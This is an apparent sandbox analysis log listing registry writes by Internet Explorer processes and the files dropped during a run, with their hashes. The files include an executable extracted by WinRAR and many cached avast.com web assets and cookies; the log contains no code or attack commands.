1440 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore | Count | 4
1440 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore | Time | E3070700040012000E0033000D00C102
1440 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore | Blocked | 4
1440 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\EUPP Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy\DSP | BackupDefaultSearchScope | ––
1440 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\User Preferences | 88D7D0879DAB32E14DE5B3A805A34F98AFF34F5977 | ––
1440 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\EUPP Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy\DSP | ChangeNotice | 0
1440 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\User Preferences | 2D53CFFC5C1A3DD2E97B7979AC2A92BD59BC839E81 | 01000000D08C9DDF0115D1118C7A00C04FC297EB0100000077D76C230A80484BAECD07D751B63AF8000000000200000000001066000000010000200000003D603E3D0F4F3CC2B034846906755CCBA803CCD58ACE1EE70D865EA316BF5963000000000E8000000002000020000000323AA9F115918F2497C54B321F0212678F990859178B72571D3A4C66FB20FA5F10000000A173104C46F964C6E88DF11FC773C03240000000A91626AB41533BBB61AC8E331AC506DCFAFC39D64016647E1B6340D7DC65603E4C4A020EFDB99BD78F606933055C3395D7ED9D62598132C385958E033BFFBF5D
1440 | iexplore.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\71\52C64B7E | LanguageList | en-US
1440 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage | DecayDateQueue | ––
1440 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage | LastProcessed | F0C2F542783DD501
1440 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MINIE | TabBandWidth | 500
2828 | IEXPLORE.EXE | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\LowCache\Content | CachePrefix |
2828 | IEXPLORE.EXE | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\LowCache\Cookies | CachePrefix | Cookie:
2828 | IEXPLORE.EXE | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\LowCache\History | CachePrefix | Visited:
2828 | IEXPLORE.EXE | write | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\avast.com | NumberOfSubdomains | 1
2828 | IEXPLORE.EXE | write | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\Total | | 3248
2828 | IEXPLORE.EXE | write | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\www.avast.com | | 17
2828 | IEXPLORE.EXE | write | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\avast.com | Total | 17
2828 | IEXPLORE.EXE | write | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\Total | | 3231
2828 | IEXPLORE.EXE | write | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\www.avast.com | | 0
2828 | IEXPLORE.EXE | write | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\avast.com | Total | 0
2828 | IEXPLORE.EXE | write | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\Total | | 3259
2828 | IEXPLORE.EXE | write | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\www.avast.com | | 28
2828 | IEXPLORE.EXE | write | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\avast.com | Total | 28
2828 | IEXPLORE.EXE | write | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\Total | | 3278
2828 | IEXPLORE.EXE | write | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\www.avast.com | | 47
2828 | IEXPLORE.EXE | write | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\avast.com | Total | 47
2828 | IEXPLORE.EXE | write | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\Total | | 4069
2828 | IEXPLORE.EXE | write | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\www.avast.com | | 838
2828 | IEXPLORE.EXE | write | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\avast.com | Total | 838
2828 | IEXPLORE.EXE | write | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\Total | | 4101
2828 | IEXPLORE.EXE | write | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\www.avast.com | | 870
2828 | IEXPLORE.EXE | write | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\avast.com | Total | 870
2828 | IEXPLORE.EXE | write | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\Total | | 4121
2828 | IEXPLORE.EXE | write | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\www.avast.com | | 890
2828 | IEXPLORE.EXE | write | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\avast.com | Total | 890
2828 | IEXPLORE.EXE | write | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\Total | | 3325
2828 | IEXPLORE.EXE | write | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\www.avast.com | | 94
2828 | IEXPLORE.EXE | write | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\avast.com | Total | 94
2828 | IEXPLORE.EXE | write | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\hotjar.com | NumberOfSubdomains | 1
2828 | IEXPLORE.EXE | write | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\Total | | 3345
2828 | IEXPLORE.EXE | write | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\www.avast.com | | 114
2828 | IEXPLORE.EXE | write | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\avast.com | Total | 114
1924 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content | CachePrefix |
1924 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies | CachePrefix | Cookie:
1924 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History | CachePrefix | Visited:
1924 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main | CompatibilityFlags | 0
1924 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings | ProxyEnable | 0
1924 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | SavedLegacySettings | 460000007B000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
1924 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | ProxyBypass | 1
1924 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | IntranetName | 1
1924 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | UNCAsIntranet | 1
1924 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | AutoDetect | 0
1924 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones | SecuritySafe | 1
1924 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Recovery\Active | {8D26CD23-A96B-11E9-9FBD-5254004AAD21} | 0
1924 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main | FullScreen | no
1924 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | Active | 0
1924 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore | Type | 3
1924 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore | Count | 5
1924 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore | Time | E3070700040012000E0033002A00D301
1924 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore | Blocked | 5
1924 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage | DecayDateQueue | ––
1924 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage | LastProcessed | 000BDB50783DD501
1924 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\WindowsSearch | UpgradeTime | FE690851783DD501
1924 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\WindowsSearch | UpgradeTime | 58CC0A51783DD501
1924 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MINIE | TabBandWidth | 500
2640 | IEXPLORE.EXE | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\LowCache\Content | CachePrefix |
2640 | IEXPLORE.EXE | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\LowCache\Cookies | CachePrefix | Cookie:
2640 | IEXPLORE.EXE | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\LowCache\History | CachePrefix | Visited:

Files activity

Executable files: 1
Suspicious files: 8
Text files: 66
Unknown types: 11

Dropped files

PID | Process | Filename | Type | MD5 | SHA256
2940 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DRa2940.39322\styer10.gxl.exe | executable | 30a498429be3c5a959ae12f9f9da118f | 6688157e9d21a6a350cc479490e572475f377e6b0c87c894286a417dc2ae22f4
2828 | IEXPLORE.EXE | C:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\HMU51R4Q\www.avast[1].xml | text | c1ddea3ef6bbef3e7060a1a9ad89e4c5 | b71e4d17274636b97179ba2d97c742735b6510eb54f22893d3a2daff2ceb28db
1924 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Internet Explorer\imagestore\toi5kkc\imagestore.dat | binary | 72f95a269682efbfcc0eb2ade7d5fbb4 | 11422212af04af53f76632958cb409c9eb13d450228a4a74a38a3e170ffa0f73
1924 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\K78MRVB5\favicon[2].ico | image | f74755b4757448d71fdcb4650a701816 | e78286d0f5dfa2c85615d11845d1b29b0bfec227bc077e74cb1ff98ce8df4c5a
1924 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Internet Explorer\Recovery\Active\{8D26CD25-A96B-11E9-9FBD-5254004AAD21}.dat | –– | –– | ––
1924 | iexplore.exe | C:\Users\admin\AppData\Local\Temp\~DF402273B03658937F.TMP | –– | –– | ––
2640 | IEXPLORE.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\OJIX3ZAU.txt | text | c6df707bf03637d8b085d701cd63bdbf | 46baec15b93e1d547da29a2a1512c872585dbfd4c0d3edb4d33ec1eb6f515d81
1440 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Internet Explorer\Recovery\Active\RecoveryStore.{7C25DFC5-A96B-11E9-9FBD-5254004AAD21}.dat | –– | –– | ––
1440 | iexplore.exe | C:\Users\admin\AppData\Local\Temp\~DFE92E26AD32977E72.TMP | –– | –– | ––
1440 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Internet Explorer\Recovery\Active\{7C25DFC7-A96B-11E9-9FBD-5254004AAD21}.dat | –– | –– | ––
1440 | iexplore.exe | C:\Users\admin\AppData\Local\Temp\~DFC4314BE1F2DE6085.TMP | –– | –– | ––
2828 | IEXPLORE.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\ZOYIQ18X\v1[1].gif | image | 57f187c7a868faeac558007a8eb6cb2e | aa03dc59bdca72631d2301e4297cfa030bd31b907dc138e7b973d12311c90a22
2828 | IEXPLORE.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\T7TROJ1C.txt | text | 8862cdd5088107df8015047207c6719e | 86bc90c0cf6bc932103a9103f584f940a4eb765849f63d6175f66f98f64edd58
2828 | IEXPLORE.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\YQPEPCE1\ec[1].js | text | 7b430c6350a59a7cf22b9adeccba327b | 058ed961bfe422af7bfc65865f4c08531ec8ace995f8a1ec560a46581cb7712c
2828 | IEXPLORE.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\XLWA6BPE\js[1].js | text | 52049cfa217072bd55ab81788698c41b | c44f65d6a3672d78419ef8cbf19902a82d8381d1b15687795cc1f2ba45202736
2828 | IEXPLORE.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\9BLWIGFF.txt | text | 497cddfb0351c653cfc62d9bfc0266bb | ea833a662f9d441ddd9093a69eff94bbdcaab9e2c2394005058e86ad3b1bbc07
2828 | IEXPLORE.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\HO0RBL91.txt | –– | –– | ––
2828 | IEXPLORE.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\HSH601LB.txt | –– | –– | ––
2828 | IEXPLORE.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\UW45TMCL.txt | –– | –– | ––
2828 | IEXPLORE.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\PWLVG21C.txt | –– | –– | ––
2828 | IEXPLORE.EXE | C:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\94LAVPQ3\vars.hotjar[1].xml | text | c1ddea3ef6bbef3e7060a1a9ad89e4c5 | b71e4d17274636b97179ba2d97c742735b6510eb54f22893d3a2daff2ceb28db
2828 | IEXPLORE.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\UJFUX3OG\box-90f3a29ef7448451db5af955688970d7[1].htm | html | 90f3a29ef7448451db5af955688970d7 | 192c6db5febe42023288fd11b0418aa35680c75f81098b4b3978614006f1c112
2828 | IEXPLORE.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\EVHKO1QF.txt | text | 2cf1d64cdb91754394e2f65b57b7f10b | b33ecc719971cd9e9ef12606613690e6ca21cea99003196fab572b3d79fb398c
2828
IEXPLORE.EXE
C:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\HMU51R4Q\www.avast[1].xml
text
MD5: 8a0181f939243f923ed534eca8afac45
SHA256: d2715375f046d31068a626c771c826d2798340907fd98b81d8ae5e63f8322655
2828
IEXPLORE.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\31I1MDDA.txt
––
MD5:  ––
SHA256:  ––
2828
IEXPLORE.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\BGVX0A1R.txt
––
MD5:  ––
SHA256:  ––
2828
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\ZOYIQ18X\advert[1].gif
image
MD5: df3e567d6f16d040326c7a0ea29a4f41
SHA256: 548f2d6f4d0d820c6c5ffbeffcbd7f0e73193e2932eefe542accc84762deec87
1440
iexplore.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\K78MRVB5\favicon[1].ico
image
MD5: 9fb559a691078558e77d6848202f6541
SHA256: 6d8a01dc7647bc218d003b58fe04049e24a9359900b7e0cebae76edf85b8b914
1440
iexplore.exe
C:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
––
MD5:  ––
SHA256:  ––
1440
iexplore.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\K78MRVB5\favicon[2].png
image
MD5: 9fb559a691078558e77d6848202f6541
SHA256: 6d8a01dc7647bc218d003b58fe04049e24a9359900b7e0cebae76edf85b8b914
1440
iexplore.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\K78MRVB5\favicon[2].ico
––
MD5:  ––
SHA256:  ––
2828
IEXPLORE.EXE
C:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\HMU51R4Q\www.avast[1].xml
text
MD5: d723d4fa33bae6aefab23c5f05618ccf
SHA256: 5b8718ca2640e910055fb6aa27e17eacd70f4daa6c7351650cb04734a32d035b
2828
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\XLWA6BPE\modules.cf35bc326ce7f74ad61b[1].js
text
MD5: 0120f403c0007d686e56f4c375180b58
SHA256: 44c769286c10756e4c81e429ba96c3b4334dfa439848e036ca04ae641c8f3d75
2828
IEXPLORE.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\B1P0DYN7.txt
text
MD5: 002137c2c8e7468ef4ff1d04a25e6b15
SHA256: 1d4e28ae695039f5dfc5b676f3850dec68901b465165020796df01ab62e17acf
2828
IEXPLORE.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\PP78EDT2.txt
––
MD5:  ––
SHA256:  ––
2828
IEXPLORE.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\VFSOQZKN.txt
––
MD5:  ––
SHA256:  ––
2828
IEXPLORE.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\AESEFFJB.txt
––
MD5:  ––
SHA256:  ––
2828
IEXPLORE.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\8R4DKELM.txt
––
MD5:  ––
SHA256:  ––
2828
IEXPLORE.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\YTV9UM37.txt
––
MD5:  ––
SHA256:  ––
2828
IEXPLORE.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\YZRJCGQU.txt
––
MD5:  ––
SHA256:  ––
2828
IEXPLORE.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\GSQLOC7P.txt
––
MD5:  ––
SHA256:  ––
2828
IEXPLORE.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\3HAUXSRS.txt
––
MD5:  ––
SHA256:  ––
2828
IEXPLORE.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\552LMCBD.txt
––
MD5:  ––
SHA256:  ––
2828
IEXPLORE.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\P0QEI6TA.txt
––
MD5:  ––
SHA256:  ––
2828
IEXPLORE.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\3Q6M2WMJ.txt
––
MD5:  ––
SHA256:  ––
2828
IEXPLORE.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\PZJL8XOD.txt
––
MD5:  ––
SHA256:  ––
2828
IEXPLORE.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\OPV0LW1W.txt
––
MD5:  ––
SHA256:  ––
2828
IEXPLORE.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\Q8N0R9EF.txt
––
MD5:  ––
SHA256:  ––
2828
IEXPLORE.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\GPPCZAV0.txt
text
MD5: 6c040ecb26aa92736c04d61eb7e7e78b
SHA256: a36f5efe4b2bc8e9f5f4aed0a3e8e1296ccb4fb1c5e0f743568278410b7b7c53
2828
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\YQPEPCE1\tooltip[1].htm
xml
MD5: 565466cc885b93457076cca068c9bcfb
SHA256: 88627dc4e16cff88ccfa389d4709d9c6abab9a6c4e32f0e2c7070a8705d8e06a
2828
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\UJFUX3OG\watch[1].js
text
MD5: 8fe4a910d25df8ed59c748c91e330dc1
SHA256: 274e349536fcfd3c874610f31f136918a6e4f659029dc966568818dc25dda396
2828
IEXPLORE.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\LBZ59RZ8.txt
––
MD5:  ––
SHA256:  ––
2828
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\ZOYIQ18X\slide-top[1].png
image
MD5: 09c7fca5ff8aa8e74c1527995ec65aa4
SHA256: 412702b3bc950702a368f5bd3dfa9c6fcd93887b35cf6b1aec25c2a9a69ddd28
2828
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\YQPEPCE1\analytics[1].js
text
MD5: 4d88a66690f3506e6a2112b1c4dce0b4
SHA256: a4883cce814b6793c5bd6dd3639d6048ecab39a93a90b560d39a9fd0aff6e263
2828
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\XLWA6BPE\hotjar-470805[1].js
text
MD5: be44940c129576813daa07deab04e438
SHA256: 5ff4565143fc4518c291f0f542591749ea27557a3df92962faec5d382fd9b9af
2828
IEXPLORE.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\BCC58H84.txt
text
MD5: ea40d55c8b8d94ec5b5f7bfe98edab3f
SHA256: 123fb0d6dd0a6ab652dd89c82fd69528de26e3cad0a267e51726fabc53eaf84e
1924
iexplore.exe
C:\Users\admin\AppData\Local\Microsoft\Internet Explorer\Recovery\Active\RecoveryStore.{8D26CD23-A96B-11E9-9FBD-5254004AAD21}.dat
––
MD5:  ––
SHA256:  ––
2828
IEXPLORE.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\WR9MHUTU.txt
text
MD5: 4321bec4eff345f2101486f75da39518
SHA256: d7551fe3ff202675801988a281dcaf2c637f60272a05fa26d56cc4db15e382a1
2828
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\UJFUX3OG\icon-social[1].png
image
MD5: e2bba2c8e64d4ae29f6ba555e8a79896
SHA256: ff652770fee72070a8a0c12f08eb3033606661806e49d47428693365e8b3ef5a
2828
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\YQPEPCE1\label-orange-l-r[1].svg
image
MD5: e646f6baca7ac4db9b5792acc7574a62
SHA256: 74ce7e6c10ffcd783f59ab673b2ffdc83879550b4a6e7e6aa5d54bdc10026838
2828
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\ZOYIQ18X\avast-software-smaller-white[1].png
image
MD5: 2cf88b869e326c63b111516f37e954ca
SHA256: 38fa8e44276501f2fcc71396800a6a150500ab970479ab85cb5716ae1ad48391
2828
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\XLWA6BPE\flag-language-selector-sprite-v10[1].png
image
MD5: 13672f1180d683c7208ea726a5f4ce2e
SHA256: 6d48f7f89b511958c0841c0cf1ded82cf290b9188b1e7953918eb593e8b5043c
2828
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\UJFUX3OG\label-orange-l-l[1].svg
image
MD5: 3de2765c63008eae30ca4aa33c00cbf6
SHA256: 40dfebee8f615ebaf39928a31a44a64b05b050b26521dc9d015e5756aafbf7ae
2828
IEXPLORE.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\63Z12HP3.txt
––
MD5:  ––
SHA256:  ––
2828
IEXPLORE.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\HPMWUX2D.txt
text
MD5: aa5c6e286be6730faabac4e7728d5a1e
SHA256: 3de0d94a1fae149f437609c498dd0149990a1d76513d0a6e319b0b8bc7a8d18e
2828
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\ZOYIQ18X\j[1].js
text
MD5: 8b98b22806ab2c7252e33c5f129c31f4
SHA256: e9c811dd778965eda613c2f1531cc3473c2c273e69205c174ec7c8c02673f2d2
2828
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\YQPEPCE1\it404[1].png
image
MD5: 8bb2209f045eb28510e559d37080823c
SHA256: 0df26efaf215eca39481fd0018ecbeb021bba0b11e83a7a4cd1fba94cb0f4644
2828
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\ZOYIQ18X\avast[1].js
text
MD5: 79a290d3ac930279b3a18d3785f31894
SHA256: 9c233f48a211e7905ab7fb34761cdf23c64503d866381615c3b40449df9d3bb5
2828
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\XLWA6BPE\proximanova-light-webfont[1].eot
eot
MD5: 5edc326061e8d8ff25d497fdbb06e8e7
SHA256: 1c86f0b81517d6c849348da814d8d886f8a0d47e2d4d441c261429913ce7a10f
2828
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\XLWA6BPE\proximanova-lightit-webfont[1].eot
eot
MD5: 9d9df457126fe3199b8889099d9fcb29
SHA256: ceecb7a157e7126638cad7d2c504f4bf7aa39a668383416914fe74310ee93f5e
2828
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\UJFUX3OG\client[1].js
binary
MD5: 68b329da9893e34099c7d8ad5cb9c940
SHA256: 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b
2828
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\UJFUX3OG\proximanova-bold-webfont[1].eot
eot
MD5: 0e9a96107705c7c24793ced5eeab4b38
SHA256: ee04f31fdd834d3ae8800d38d6f37bc5d7681dc7945b06a94b183963614ca72f
2828
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\ZOYIQ18X\proximanova-regular-webfont[1].eot
eot
MD5: 0e1daeaf146d0a08097513315655f19e
SHA256: 3eed3197aecf9c5bdd35eddb9431cddfd263879f01780de18de7331a3b957573
2828
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\YQPEPCE1\gtm[1].js
text
MD5: 9526a0d4763af6dcbaccff2b8b261275
SHA256: cf9b69973b0f61e684c95fcc5bef85e5be8bb777c0c80a4ba86fe704671e2427
2828
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\YQPEPCE1\jquery[1].js
text
MD5: 1eceeafc65bb7284f92c4fa606a2ce20
SHA256: 45d919ae107284dc419f9a83de4afaa7675f5ce0f1b28e2cafb7b1b81cbbabfe
2828
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\XLWA6BPE\icon-search-32[1].png
image
MD5: 2235859c6b8d2234115aa9de82e17fe0
